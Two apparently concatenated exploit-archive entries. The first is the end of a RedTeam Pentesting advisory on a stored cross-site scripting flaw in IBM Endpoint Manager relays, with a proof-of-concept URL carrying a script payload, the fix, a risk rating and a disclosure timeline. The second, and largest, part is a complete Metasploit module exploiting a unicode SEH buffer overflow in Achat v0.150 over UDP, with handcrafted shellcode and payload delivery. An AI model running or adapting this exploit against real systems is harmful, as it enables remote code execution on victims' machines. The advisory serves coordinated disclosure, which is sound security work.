http://tem-relay.example.com:52311/cgi-bin/bfenterprise/ BESGatherMirrorNew.exe/-gatherversion ?Body=GatherSpecifiedVersion &version=1 &url=http://"><script>alert(/XSS/)</script> &version=1 &useCRC=0 The value of that parameter is also stored in the TEM Relay's site list, so that the embedded JavaScript code is executed whenever the diagnostics page is opened in a browser: $ curl http://tem-relay.example.com:52311/rd [...] <select NAME="url"> [...] <option>http://"><script>alert(/XSS/)</script></option> </select> Proof of Concept ================ http://tem-relay.example.com:52311/cgi-bin/bfenterprise/ BESGatherMirrorNew.exe/-gatherversion ?Body=GatherSpecifiedVersion&version=1 &url=http://"><script>alert(/XSS/)</script> &version=1 &useCRC=0 Fix === Upgrade IBM Endpoint Manager to version 9.1.1229 or 9.2.1.48. Security Risk ============= As the relay diagnostics page is typically not frequented by administrators and does not normally require authentication, it is unlikely that the vulnerability can be exploited to automatically and reliably attack administrative users and obtain their credentials. Nevertheless, the ability to host arbitrary HTML and JavaScript code on the relay diagnostics page, i.e. on a trusted system, may allow attackers to conduct very convincing phishing attacks. This vulnerability is therefore rated as a medium risk. Timeline ======== 2014-07-29 Vulnerability identified during a penetration test 2014-08-06 Customer approves disclosure to vendor 2014-09-03 Vendor notified 2015-01-13 Vendor releases security bulletin and software upgrade 2015-02-04 Customer approves public disclosure 2015-02-10 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Achat v0.150 beta7 Buffer Overflow', 'Description' => %q{ This module exploits an unicode SEH based stack buffer overflow in Achat v0.150. By sending a crafted message to the default port 9256 it's possible to overwrites the SEH handler. Even when the exploit is reliable it depends of timing since there are two threads overflowing the stack in the same time. This module has been tested on Windows XP SP3 and Windows 7. }, 'Author' => [ 'Peter Kasza <peter.kasza[at]itinsight.hu>', # Vulnerability discovery 'Balazs Bucsay <balazs.bucsay[at]rycon.hu>' # Exploit, Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CWE', '121'], ], 'DefaultOptions' => { 'EXITFUNC' => 'process' }, 'Payload' => { 'DisableNops' => true, 'Space' => 730, 'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"), 'StackAdjustment' => -3500, 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed, 'EncoderOptions' => { 'BufferRegister' => 'EAX' } }, 'Platform' => 'win', 'Targets' => [ # Tested OK Windows XP SP3, Windows 7 # Not working on Windows Server 2003 [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ] #ppr from AChat.exe ], 'Privileged' => false, 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 18 2014')) register_options( [ Opt::RPORT(9256) ], self.class) end def exploit connect_udp # 0055 00 ADD BYTE PTR SS:[EBP],DL # padding # 2A00 SUB AL,BYTE PTR DS:[EAX] # padding # 55 PUSH EBP # ebp holds a close pointer to the payload # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 58 POP EAX # mov eax, ebp # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 05 00140011 ADD EAX,11001400 # adjusting eax # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 2D 00130011 SUB EAX,11001300 # lea eax, eax+100 # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 50 PUSH EAX # eax points to the start of the shellcode # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 58 POP EAX # padding # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 59 POP ECX # padding # 0039 ADD BYTE PTR DS:[ECX],BH # padding first_stage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39" sploit = 'A0000000002#Main' + "\x00" + 'Z' * 114688 + "\x00" + "A" * 10 + "\x00" sploit << 'A0000000002#Main' + "\x00" + 'A' * 57288 + 'AAAAASI' * 50 + 'A' * (3750 - 46) sploit << "\x62" + 'A' * 45 # 0x62 will be used to calculate the right offset sploit << "\x61\x40" # POPAD + INC EAX sploit << target.ret # AChat.exe p/p/r address # adjusting the first thread's unicode payload, tricky asm-fu # the first seh exception jumps here, first_stage variable will be executed # by the second seh exception as well. It needs to be in sync with the second # thread, so that is why we adjust eax/ebp to have a close pointer to the # payload, then first_stage variable will take the rest of the job. # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 55 PUSH EBP # ebp with close pointer to payload # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 58 POP EAX # put ebp to eax # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding # 2A00 SUB AL,BYTE PTR DS:[EAX] # setting eax to the right place # 2A00 SUB AL,BYTE PTR DS:[EAX] # adjusting eax a little bit more # 05 00140011 ADD EAX,11001400 # more adjusting # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 2D 00130011 SUB EAX,11001300 # lea eax, eax+100 # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 50 PUSH EAX # saving eax # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding # 5D POP EBP # mov ebp, eax sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + 'C' * 9 + "\x60\x43" sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread sploit << "\x2A" + first_stage + 'C' * (157 - first_stage.length - 31 -3) # put address of the payload to EAX sploit << payload.encoded + 'A' * (1152 - payload.encoded.length) # placing the payload sploit << "\x00" + 'A' * 10 + "\x00" i = 0 while i < sploit.length do if i > 172000 Rex::sleep(1.0) end sent = udp_sock.put(sploit[i..i + 8192 - 1]) i += sent end disconnect_udp end end